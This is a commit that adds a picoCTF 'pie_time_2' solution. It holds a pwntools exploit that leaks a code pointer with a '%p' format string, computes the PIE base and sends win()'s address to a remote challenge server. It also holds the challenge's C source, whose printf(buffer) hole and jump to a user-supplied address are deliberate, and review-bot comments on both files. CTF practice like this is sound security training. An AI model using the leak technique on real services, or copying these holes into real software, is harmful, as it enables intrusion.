pwn/pie_time_2

This commit is contained in:
2026-07-02 08:14:25 +09:00
parent 91c0fd7d66
commit dd03456686
4 changed files with 101 additions and 0 deletions
+1
@@ -0,0 +1 @@
picoCTF{dummy}
+44
@@ -0,0 +1,44 @@
#!/usr/bin/env nix-shell
#!nix-shell -i python3 -p "python3.withPackages (ppkgs: with ppkgs; [ pwntools ])"
from pwn import *
exe = ELF("./vuln")
context.binary = exe
ADDR, PORT, *_ = "rescued-float.picoctf.net 54718".split()
def conn() -> remote:
if args.REMOTE:
r = remote(ADDR, PORT)
else:
r = process([exe.path])
return r
def main():
r = conn()
# gdb.attach(r, gdbscript='''
# info proc mappings
# c
# ''')
# Calculated by inspecting the output - the reported binary start address from gdb
leak_offset = 0x1441
r.recvuntil(b'Enter your name:').decode()
r.sendline(b'%p\t'*20)
leaks = r.recvline().strip().decode().split('\t')
base_leak = leaks[18]
exe.address = int(base_leak[2:], 16) - leak_offset
print(f"Base address: {hex(exe.address)}, jump to win: {hex(exe.symbols['win'])}")
print(r.recvuntil(b' enter the address to jump to, ex => 0x12345: ').decode())
r.sendline(hex(exe.symbols['win']))
print(r.recvall().decode())
r.close()
if __name__ == "__main__":
main()
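Review bot: The base computation `exe.address = int(base_leak[2:], 16) - leak_offset` trusts that `leaks[18]` is the code pointer the hard-coded `leak_offset = 0x1441` was measured against, and a different build of `./vuln` or a `(nil)` in that slot silently produces a garbage base instead of an error. `int()` already accepts a `0x` prefix, so the slice is unnecessary, and a PIE base must be page-aligned, which gives a cheap sanity check before the jump: `exe.address = int(base_leak, 16) - leak_offset` followed by `assert exe.address & 0xfff == 0, f"unaligned base {exe.address:#x}: leak index/offset mismatch"`. A comment above `leak_offset` saying which `%p` slot it was derived from (the 19th) and that it is specific to this build of `vuln` would let the next person re-derive it instead of guessing.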
BIN
+56
@@ -0,0 +1,56 @@
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
void segfault_handler() {
printf("Segfault Occurred, incorrect address.\n");
exit(0);
}
void call_functions() {
char buffer[64];
printf("Enter your name:");
fgets(buffer, 64, stdin);
printf(buffer);
unsigned long val;
printf(" enter the address to jump to, ex => 0x12345: ");
scanf("%lx", &val);
void (*foo)(void) = (void (*)())val;
foo();
}
int win() {
FILE *fptr;
char c;
printf("You won!\n");
// Open file
fptr = fopen("flag.txt", "r");
if (fptr == NULL)
{
printf("Cannot open file.\n");
exit(0);
}
// Read contents from file
c = fgetc(fptr);
while (c != EOF)
{
printf ("%c", c);
c = fgetc(fptr);
}
printf("\n");
fclose(fptr);
}
int main() {
signal(SIGSEGV, segfault_handler);
setvbuf(stdout, NULL, _IONBF, 0); // _IONBF = Unbuffered
call_functions();
return 0;
}
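Review bot: In `win()`, `char c` stores the result of `fgetc()` and `while (c != EOF)` compares it against the `int` constant EOF, so a 0xFF byte in `flag.txt` would end the read early with a signed `char` or loop forever with an unsigned one; `fgetc` returns `int` precisely so EOF stays distinguishable from every byte value, and `int c;` is the fix. `win` is also declared `int` but never returns a value, and it is only ever reached through a `void (*)(void)` pointer, so `void win()` would match its actual use. The `printf(buffer)` format string and the indirect call through `val` in `call_functions` look deliberate for the challenge, so I am not raising them, but `segfault_handler` calling `printf` and `exit` from a signal handler is not async-signal-safe; `write(1, ...)` and `_exit(0)` would be the safe equivalents if the handler ever needs to be relied on.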